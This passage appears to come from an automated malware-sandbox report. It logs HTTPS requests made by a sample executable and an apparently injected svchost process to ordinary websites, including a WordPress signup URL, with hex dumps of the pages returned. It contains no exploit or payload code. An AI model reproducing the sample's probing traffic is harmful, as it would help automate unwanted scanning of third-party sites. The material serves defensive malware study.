                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC673INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        47192.168.2.65493891.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC672OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC675INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC675INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC691INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC707INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC723INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        48192.168.2.655012188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC672OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC674INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:16 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfUE76F9Aak6awLMnHOgRJ15JLBI3QctJfcF6ZQFJtTxIFN%2FBfgBBjizvzGD2FACljmlyd7JmT9SrzHevdbB%2FYf69NtPznuSA3oCE4mUPDi5OtmCSsPIKiXm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8280ecd9bbc-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC675INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC675INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        49192.168.2.655016172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC672OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC724INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:21 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:21 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=euxLt5Np6r%2B605VTXwKEQ5TgtwuXUqUv1VvM%2Ftu5U%2Bb5WdiNf5A7jSBUz%2BCV6QjNUXOBhrVmVPJo%2FV2ig8bN8mlGjYsWk4pgaW9TqRGeJS7OPIP3oyJo5BkbGiIipLF8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8282ff92c21-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC725INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC725INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        5192.168.2.65034391.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC53INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:37 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC53INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC69INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC85INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC101INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        50192.168.2.65501483.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC673OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC913INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=97
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC913INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC917INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC925INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
